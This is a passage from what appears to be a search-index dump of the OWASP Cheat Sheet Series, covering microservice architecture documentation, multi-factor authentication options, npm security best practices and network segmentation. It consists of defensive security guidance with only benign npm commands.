Parameter name Description Service name (ID) Specify service name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Access type Specify access type, e.g. \"Read\" or \"Read/Write\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-synchronous-communications","title":"Identify \"service-to-service\" synchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" synchronous communication.

Parameter name Description Caller service name (ID) Specify caller service name (ID) defined above Called service name (ID) Specify called service name (ID) defined above Protocol/framework used Specify protocol/framework used for communication, e.g. HTTP (REST, SOAP), Apache Thrift, gRPC Short description Shortly describe the purpose of communication (requests for query of information or request/commands for a state-changing business function) and data passed between services (if possible, in therms of assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-asynchronous-communications","title":"Identify \"service-to-service\" asynchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" asynchronous communication.

Parameter name Description Publisher service name (ID) Specify publisher service name (ID) defined above Subscriber service name (ID) Specify subscriber service name (ID) defined above Message queue (ID) Specify message queue (ID) defined above Short description Shortly describe the purpose of communication (receiving of information or commands for a state-changing business function) and data passed between services (if possible, in therms of assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-asset-to-storage-relations","title":"Identify \"asset-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"asset-to-storage\" relation.

Parameter name Description Asset name (ID) Asset name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Storage type Specify storage type for the asset, e.g. \"golden source\" or \"cache\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#create-a-graphical-presentation-of-application-architecture","title":"Create a graphical presentation of application architecture","text":"

It is advisable to create graphical presentation of application architecture (building blocks and relations defined above) in form of services call graph or data flow diagram. In order to do that one can use special software tools (e.g. Enterprise Architect) or DOT language. See example of using DOT language here.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#use-collected-information-in-secure-software-development-practices","title":"Use collected information in secure software development practices","text":"

Collected information may be useful for doing application security practices, e.g. during defining security requirements, threat modeling or security testing. Sections below contains examples of activities related to securing application architecture (as well as its mapping to OWASP projects) and tips for their implementation using information collected above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#attack-surface-analysis","title":"Attack surface analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips","title":"Implementation tips","text":"

To enumerate microservices endpoints that need to be tested during security testing and analyzed during threat modeling analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#data-leakage-analysis","title":"Data leakage analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_1","title":"Implementation tips","text":"

To analyze possible data leakage analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_1","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#applications-trust-boundaries-components-and-significant-data-flows-justification","title":"Application's trust boundaries, components, and significant data flows justification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_2","title":"Implementation tips","text":"

To verify documentation and justification of all the application's trust boundaries, components, and significant data flows analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_2","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#analysis-of-the-applications-high-level-architecture","title":"Analysis of the application's high-level architecture","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_3","title":"Implementation tips","text":"

To verify definition and security analysis of the application's high-level architecture and all connected remote services analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_3","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-of-centralized-security-controls-verification","title":"Implementation of centralized security controls verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_4","title":"Implementation tips","text":"

To verify implementation of centralized, simple (economy of design), vetted, secure, and reusable security controls to avoid duplicate, missing, ineffective, or insecure controls analyze data collected under the section \"Identify and describe infrastructure services\".

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_4","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#enforcement-of-the-principle-of-least-privilege","title":"Enforcement of the principle of least privilege","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_5","title":"Implementation tips","text":"

To define minimally needed microservice permissions analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_5","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#sensitive-data-identification-and-classification","title":"Sensitive data identification and classification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_6","title":"Implementation tips","text":"

To verify that all sensitive data is identified and classified into protection levels analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_6","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#application-components-businesssecurity-functions-verification","title":"Application components business/security functions verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_7","title":"Implementation tips","text":"

To verify the definition and documentation of all application components in terms of the business or security functions they provide analyze data collected under the following sections (parameter \"Short description\"):

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_7","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html","title":"Multi-Factor Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Multi-Factor authentication (MFA), or Two-Factor Authentication (2FA) is when a user is required to present more than one type of evidence in order to authenticate on a system. There are four different types of evidence (or factors) that can be used, listed in the table below:

Factor Examples Something You Know Passwords, PINs and security questions. Something You Have Hardware or software tokens, certificates, email, SMS and phone calls. Something You Are Fingerprints, facial recognition, iris scans and handprint scans. Location Source IP ranges and geolocation

It should be emphasised that while requiring multiple examples of a single factor (such as needing both a password and a PIN) does not constitute MFA, although it may provide some security benefits over a simple password.

Additionally, while the following sections discuss the disadvantage and weaknesses of various different types of MFA, in many cases these are only relevant against targeted attacks. Any MFA is better than no MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#advantages","title":"Advantages","text":"

The most common way that user accounts get compromised on applications is through weak, re-used or stolen passwords. Despite any technical security controls implemented on the application, users are liable to choose weak passwords, or to use the same password on different applications. As developers or system administrators, it should be assumed that users' passwords will be compromised at some point, and the system should be designed in order to defend against this.

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including brute-force, credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

The biggest disadvantage of MFA is the increase in management complexity for both administrators and end users. Many less technical users may find it difficult to configure and use MFA. Additionally, there are a number of other common issues encountered:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#quick-recommendations","title":"Quick Recommendations","text":"

Exactly when and how MFA is implemented in an application will vary on a number of different factors, including the threat model of the application, the technical level of the users, and the level of administrative control over the users. These need to be considered on a per-application basis.

However, the following recommendations are generally appropriate for most applications, and provide an initial starting point to consider.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#implementing-mfa","title":"Implementing MFA","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#when-to-require-mfa","title":"When to Require MFA","text":"

The most important place to require MFA on an application is when the user logs in. However, depending on the functionality available, it may also be appropriate to require MFA for performing sensitive actions, such as:

If the application provides multiple ways for a user to authenticate these should all require MFA, or have other protections implemented. A common area that is missed is if the application provides a separate API that can be used to login, or has an associated mobile application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#improving-usability","title":"Improving Usability","text":"

Having to frequently login with MFA creates an additional burden for users, and may cause them to disable MFA on the application. A number of mechanisms can be used to try and reduce the level of annoyance that MFA causes. However, these types of measures do decrease the security provided by MFA, so need to be risk assessed to find a reasonable balance of security and usability for the application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#failed-login-attempts","title":"Failed Login Attempts","text":"

When a user enters their password, but fails to authenticate using a second factor, this could mean one of two things:

There are a number of steps that should be taken when this occurs:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#resetting-mfa","title":"Resetting MFA","text":"

One of the biggest challenges with implementing MFA is handling users who forget or lose their second factors. There are many ways this could happen, such as:

In order to prevent users from being locked out of the application, there needs to be a mechanism for them to regain access to their account if they can't use their existing MFA; however it is also crucial that this doesn't provide an attacker with a way to bypass MFA and hijack their account.

There is no definitive \"best way\" to do this, and what is appropriate will vary hugely based on the security of the application, and also the level of control over the users. Solutions that work for a corporate application where all the staff know each other are unlikely to be feasible for a publicly available application with thousands of users all over the world. Every recovery method has its own advantages and disadvantages, and these need to be evaluated in the context of the application.

Some suggestions of possible methods include:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-know","title":"Something You Know","text":"

The most common type of authentication is based on something the users knows - typically a password. The biggest advantage of this factor is that it has very low requirements for both the developers and the end user, as it does not require any special hardware, or integration with other services.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#passwords-and-pins","title":"Passwords and PINs","text":"

Passwords and PINs are the most common form of authentication due to the simplicity of implementing them. The Authentication Cheat Sheet has guidance on how to implement a strong password policy, and the Password Storage Cheat Sheet has guidance on how to securely store passwords.

Most multi-factor authentication systems make use of a password, as well as at least one other factor.

It should be noted that PINs, \"secret words\" and other similar type of information are all effectively the same as passwords. Using two different types of passwords does not constitute MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions require the user to choose (or create) a number of questions that only they will know the answer to. These are effectively the same as passwords, although they are generally considered weaker. The Choosing and Using Security Questions Cheat Sheet contains further guidance on how to implement these securely.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_1","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_1","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-have","title":"Something You Have","text":"

The second factor is something that the user possesses. This could be a physical item (such as a hardware token), a digital item (such as a certificate or private key), or based on the ownership of a mobile phone, phone number, or email address (such as SMS or a software token installed on the phone, or an email with a single-use verification code).

If properly implemented then this can be significantly more difficult for a remote attacker to compromise; however it also creates an additional administrative burden on the user, as they must keep the authentication factor with them whenever they wish to use it.

The requirement to have a second factor can also limit certain types of users' ability to access a service. For example, if a user does not have access to a mobile phone, many types of MFA will not be available for them.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-otp-tokens","title":"Hardware OTP Tokens","text":"

Physical hardware OTP tokens can be used which generate constantly changing numeric codes, which must be submitted when authentication on the application. Most well-known of these is the RSA SecureID, which generates a six digit number that changes every 60 seconds.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_2","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_2","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#software-totp-tokens","title":"Software TOTP Tokens","text":"

A cheaper and easier alternative to hardware tokens is using software to generate Time-based One Time Password (TOTP) codes. This would typically involve the user installing a TOTP application on their mobile phone, and then scanning a QR code provided by the web application which provides the initial seed. The authenticator app then generates a six digit number every 60 seconds, in much the same way as a hardware token.

Most websites use standardized TOTP tokens, allowing the user to install any authenticator app that supports TOTP. However, a small number of applications use their own variants of this (such as Symantec), which requires the users to install a specific app in order to use the service. This should be avoided in favour of a standards-based approach.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_3","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_3","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-u2f-tokens","title":"Hardware U2F Tokens","text":"

Hardware U2F tokens communicate with the users workstation over USB or NFC, and implement challenge-response based authentication, rather than requiring the user to manually enter the code. This would typically be done by the user pressing a button on the token, or tapping it against their NFC reader.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_4","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_4","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#certificates","title":"Certificates","text":"

Digital certificates are files that are stored on the user's device which are automatically provided alongside the user's password when authenticating. The most common type is X.509 certificates (discussed in the Transport Layer Protection Cheat Sheet), more commonly known as client certificates.

Certificates are supported by all major web browsers, and once installed require no further interaction from the user. The certificates should be linked to an individual's user account in order to prevent users from trying to authenticate against other accounts.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_5","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_5","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#smartcards","title":"Smartcards","text":"

Smartcards are credit-card size cards with a chip containing a digital certificate for the user, which is unlocked with a PIN. They are commonly used for operating system authentication, but are rarely used in web applications.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_6","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_6","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#sms-messages-and-phone-calls","title":"SMS Messages and Phone Calls","text":"

SMS messages or phone calls can be used to provide users with a single-use code that they must submit as a second factor.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_7","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_7","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#email","title":"Email","text":"

Email verification requires that the user enters a code or clicks a link sent to their email address. There is some debate as to whether email constitutes a form of MFA, because if the user does not have MFA configured on their email account, it simply requires knowledge of the user's email password (which is often the same as their application password). However, it is included here for completeness.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_8","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_8","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-are","title":"Something You Are","text":"

The final factor in the traditional view of MFA is something you are - which is one of the physical attributes of the users (often called biometrics). Biometrics are rarely used in web applications due to the requirement for users to have specific hardware.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#biometrics","title":"Biometrics","text":"

The are a number of common types of biometrics that are used, including:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_9","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_9","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#location","title":"Location","text":"

The use of location as a fourth factor for MFA is not fully accepted; however, it is increasingly be used for authentication. It is sometimes argued that location is used when deciding whether or not to require MFA (as discussed above) however this is effectively the same as considering it to be a factor in its own right. Two prominent examples of this are the Conditional Access Policies available in Microsoft Azure, and the Network Unlock functionality in BitLocker.

When talking about location, access to the application that the user is authenticating against is not usually considered (as this would always be the case, and as such is relatively meaningless).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#source-ip-ranges","title":"Source IP Ranges","text":"

The source IP address the user is connecting from can be used as a factor, typically in an allow-list based approach. This could either be based on a static list (such as corporate office ranges) or a dynamic list (such as previous IP addresses the user has authenticated from).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_10","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_10","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#geolocation","title":"Geolocation","text":"

Rather than using the exact IP address of the user, the geographic location that the IP address is registered to can be used. This is less precise, but may be more feasible to implement in environments where IP addresses are not static. A common usage would be to require additional authentication factors when an authentication attempt is made from outside of the user's normal country.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_11","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_11","title":"Cons","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html","title":"NPM Security best practices","text":"

In the following npm cheatsheet, we\u2019re going to focus on 10 npm security best practices and productivity tips, useful for JavaScript and Node.js developers.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#1-avoid-publishing-secrets-to-the-npm-registry","title":"1) Avoid publishing secrets to the npm registry","text":"

Whether you\u2019re making use of API keys, passwords or other secrets, they can very easily end up leaking into source control or even a published package on the public npm registry. You may have secrets in your working directory in designated files such as a .env which should be added to a .gitignore to avoid committing it to a SCM, but what happen when you publish an npm package from the project\u2019s directory?

The npm CLI packs up a project into a tar archive (tarball) in order to push it to the registry. The following criteria determine which files and directories are added to the tarball:

Developers may end up updating the .gitignore file, but forget to update .npmignore as well, which can lead to a potentially sensitive file not being pushed to source control, but still being included in the npm package.

Another good practice to adopt is making use of the files property in package.json, which works as a whitelist and specifies the array of files to be included in the package that is to be created and installed (while the ignore file functions as a blacklist). The files property and an ignore file can both be used together to determine which files should explicitly be included, as well as excluded, from the package. When using both, the former the files property in package.json takes precedence over the ignore file.

When a package is published, the npm CLI will verbosely display the archive being created. To be extra careful, add a --dry-run command-line argument to your publish command in order to first review how the tarball is created without actually publishing it to the registry.

In January 2019, npm shared on their blog that they added a mechanism that automatically revokes a token if they detect that one has been published with a package.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#2-enforce-the-lockfile","title":"2) Enforce the lockfile","text":"

We embraced the birth of package lockfiles with open arms, which introduced: deterministic installations across different environments, and enforced dependency expectations across team collaboration. Life is good! Or so I thought\u2026 what would have happened had I slipped a change into the project\u2019s package.json file but had forgotten to commit the lockfile along side of it?

Both Yarn, and npm act the same during dependency installation . When they detect an inconsistency between the project\u2019s package.json and the lockfile, they compensate for such change based on the package.json manifest by installing different versions than those that were recorded in the lockfile.

This kind of situation can be hazardous for build and production environments as they could pull in unintended package versions and render the entire benefit of a lockfile futile.

Luckily, there is a way to tell both Yarn and npm to adhere to a specified set of dependencies and their versions by referencing them from the lockfile. Any inconsistency will abort the installation. The command-line should read as follows:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#3-minimize-attack-surfaces-by-ignoring-run-scripts","title":"3) Minimize attack surfaces by ignoring run-scripts","text":"

The npm CLI works with package run-scripts. If you\u2019ve ever run npm start or npm test then you\u2019ve used package run-scripts too. The npm CLI builds on scripts that a package can declare, and allows packages to define scripts to run at specific entry points during the package\u2019s installation in a project. For example, some of these script hook entries may be postinstall scripts that a package that is being installed will execute in order to perform housekeeping chores.

With this capability, bad actors may create or alter packages to perform malicious acts by running any arbitrary command when their package is installed. A couple of cases where we\u2019ve seen this already happening is the popular eslint-scope incident that harvested npm tokens, and the crossenv incident, along with 36 other packages that abused a typosquatting attack on the npm registry.

Apply these npm security best practices in order to minimize the malicious module attack surface:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#4-assess-npm-project-health","title":"4) Assess npm project health","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-outdated-command","title":"npm outdated command","text":"

Rushing to constantly upgrade dependencies to their latest releases is not necessarily a good practice if it is done without reviewing release notes, the code changes, and generally testing new upgrades in a comprehensive manner. With that said, staying out of date and not upgrading at all, or after a long time, is a source for trouble as well.

The npm CLI can provide information about the freshness of dependencies you use with regards to their semantic versioning offset. By running npm outdated, you can see which packages are out of date. Dependencies in yellow correspond to the semantic versioning as specified in the package.json manifest, and dependencies colored in red mean that there\u2019s an update available. Furthermore, the output also shows the latest version for each dependency.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-doctor-command","title":"npm doctor command","text":"

Between the variety of Node.js package managers, and different versions of Node.js you may have installed in your path, how do you verify a healthy npm installation and working environment? Whether you\u2019re working with the npm CLI in a development environment or within a CI, it is important to assess that everything is working as expected.

Call the doctor! The npm CLI incorporates a health assessment tool to diagnose your environment for a well-working npm interaction. Run npm doctor to review your npm setup:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#5-audit-for-vulnerabilities-in-open-source-dependencies","title":"5) Audit for vulnerabilities in open source dependencies","text":"

The npm ecosystem is the single largest repository of application libraries amongst all the other language ecosystems. The registry and the libraries in it are at the core for JavaScript developers as they are able to leverage work that others have already built and incorporate it into their codebase. With that said, the increasing adoption of open source libraries in applications brings with it an increased risk of introducing security vulnerabilities.

Many popular npm packages have been found to be vulnerable and may carry a significant risk without proper security auditing of your project\u2019s dependencies. Some examples are npm request, superagent, mongoose, and even security-related packages like jsonwebtoken, and validator.

Security doesn\u2019t end by just scanning for security vulnerabilities when installing a package but should also be streamlined with developer workflows to be effectively adopted throughout the entire lifecycle of software development, and monitored continuously when code is deployed:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#6-use-a-local-npm-proxy","title":"6) Use a local npm proxy","text":"

The npm registry is the biggest collection of packages that is available for all JavaScript developers and is also the home of the most of the Open Source projects for web developers. But sometimes you might have different needs in terms of security, deployments or performance. When this is true, npm allows you to switch to a different registry:

When you run npm install, it automatically starts a communication with the main registry to resolve all your dependencies; if you wish to use a different registry, that too is pretty straightforward:

Verdaccio is a simple lightweight zero-config-required private registry and installing it is as simple as follows: $ npm install --global verdaccio.

Hosting your own registry was never so easy! Let\u2019s check the most important features of this tool:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#7-responsibly-disclose-security-vulnerabilities","title":"7) Responsibly disclose security vulnerabilities","text":"

When security vulnerabilities are found, they pose a potentially serious threat if publicly disclosed without prior warning or appropriate mitigation available for users to protect themselves.

It is recommended that security researchers follow a responsible disclosure program, which is a set of processes and guidelines that aims to connect the researchers with the vendor or maintainer of the vulnerable asset, in order to convey the vulnerability, it\u2019s impact and applicability. Once the vulnerability is correctly triaged, the vendor and researcher coordinate a fix and a publication date for the vulnerability in an effort to provide an upgrade-path or remediation for affected users before the security issue is made public.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#8-enable-2fa","title":"8) Enable 2FA","text":"

In October 2017, npm officially announced support for two-factor authentication (2FA) for developers using the npm registry to host their closed and open source packages.

Even though 2FA has been supported on the npm registry for a while now, it seems to be slowly adopted with one example being the eslint-scope incident in mid-2018 when a stolen developer account on the ESLint team lead to a malicious version of eslint-scope being published by bad actors.

Enabling 2FA is an easy and significant win for an npm security best practices. The registry supports two modes for enabling 2FA in a user\u2019s account:

Equip yourself with an authentication application, such as Google Authentication, which you can install on a mobile device, and you\u2019re ready to get started. One easy way to get started with the 2FA extended protection for your account is through npm\u2019s user interface, which allows enabling it very easily. If you\u2019re a command-line person, it\u2019s also easy to enable 2FA when using a supported npm client version (>=5.5.1):

npm profile enable-2fa auth-and-writes\n

Follow the command-line instructions to enable 2FA, and to save emergency authentication codes. If you wish to enable 2FA mode for login and profile changes only, you may replace the auth-and-writes with auth-only in the code as it appears above.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#9-use-npm-author-tokens","title":"9) Use npm author tokens","text":"

Every time you log in with the npm CLI, a token is generated for your user and authenticates you to the npm registry. Tokens make it easy to perform npm registry-related actions during CI and automated procedures, such as accessing private modules on the registry or publishing new versions from a build step.

Tokens can be managed through the npm registry website, as well as using the npm command-line client. An example of using the CLI to create a read-only token that is restricted to a specific IPv4 address range is as follows:

npm token create --read-only --cidr=192.0.2.0/24\n

To verify which tokens are created for your user or to revoke tokens in cases of emergency, you can use npm token list or npm token revoke respectively.

Ensure you are following this npm security best practice by protecting and minimizing the exposure of your npm tokens.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#10-understand-module-naming-conventions-and-typosquatting-attacks","title":"10) Understand module naming conventions and typosquatting attacks","text":"

Naming a module is the first thing you might do when creating a package, but before defining a final name, npm defines some rules that a package name must follow:

Typosquatting is an attack that relies on mistakes made by users, such as typos. With typosquatting, bad actors could publish malicious modules to the npm registry with names that look much like existing popular modules.

We have been tracking tens of malicious packages in the npm ecosystem; they have been seen on the PyPi Python registry as well. Perhaps some of the most popular incidents have been for cross-env, event-stream, and eslint-scope.

One of the main targets for typosquatting attacks are the user credentials, since any package has access to environment variables via the global variable process.env. Other examples we\u2019ve seen in the past include the case with event-stream, where the attack targeted developers in the hopes of injecting malicious code into an application\u2019s source code.

Closing our list of ten npm security best practices are the following tips to reduce the risk of such attacks:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html","title":"Network segmentation Cheat Sheet","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Network segmentation is the core of multi-layer defense in depth for modern services. Segmentation slow down an attacker if he cannot implement attacks such as:

The main goal of this cheat sheet is to show the basics of network segmentation to effectively counter attacks by building a secure and maximally isolated service network architecture.

Segmentation will avoid the following situations:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#content","title":"Content","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#schematic-symbols","title":"Schematic symbols","text":"

Elements used in network diagrams:

Crossing the border of the rectangle means crossing the firewall:

In the image above, traffic passes through two firewalls with the names FW1 and FW2

In the image above, traffic passes through one firewall, behind which there are two VLANs

Further, the schemes do not contain firewall icons so as not to overload the schemes

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#three-layer-network-architecture","title":"Three-layer network architecture","text":"

By default, developed information systems should consist of at least three components (security zones):

  1. FRONTEND;
  2. MIDDLEWARE;
  3. BACKEND.
"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#frontend","title":"FRONTEND","text":"

FRONTEND - A frontend is a set of segments with the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#middleware","title":"MIDDLEWARE","text":"

MIDDLEWARE - a set of segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#backend","title":"BACKEND","text":"

BACKEND - a set of network segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#example-of-three-layer-network-architecture","title":"Example of Three-layer network architecture","text":"

The following example shows an organization's local network. The organization is called \"\u0421ontoso\".

The edge firewall contains 2 VLANs of FRONTEND security zone:

The internal firewall contains 4 VLANs:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#interservice-interaction","title":"Interservice interaction","text":"

Usually some information systems of the company interact with each other. It is important to define a firewall policy for such interactions. The base allowed interactions are indicated by the green arrows in the image below: The image above also shows the allowed access from the FRONTEND and MIDDLEWARE segments to external networks (the Internet, for example).

From this image follows:

  1. Access between FRONTEND and MIDDLEWARE segments of different information systems is prohibited;
  2. Access from the MIDDLEWARE segment to the BACKEND segment of another service is prohibited (access to a foreign database bypassing the application server is prohibited).

Forbidden accesses are indicated by red arrows in the image below:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#many-applications-on-the-same-network","title":"Many applications on the same network","text":"

If you prefer to have fewer networks in your organization and host more applications on each network, it is acceptable to host the load balancer on those networks. This balancer will balance traffic to applications on the network. In this case, it will be necessary to open one port to such a network, and balancing will be performed, for example, based on the HTTP request parameters. An example of such segmentation:

As you can see, there is only one incoming access to each network, access is opened up to the balancer in the network. However, in this case, segmentation no longer works, access control between applications from different network segments is performed at the 7th level of the OSI model using a balancer.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#network-security-policy","title":"Network security policy","text":"

The organization must define a \"paper\" policy that describes firewall rules and basic allowed network access. This policy is at least useful:

It is convenient when the policy is described by similar images. The information is presented as concisely and simply as possible.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#examples-of-individual-policy-provisions","title":"Examples of individual policy provisions","text":"

Examples in the network policy will help colleagues quickly understand what access is potentially allowed and can be requested.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-cicd","title":"Permissions for CI/CD","text":"

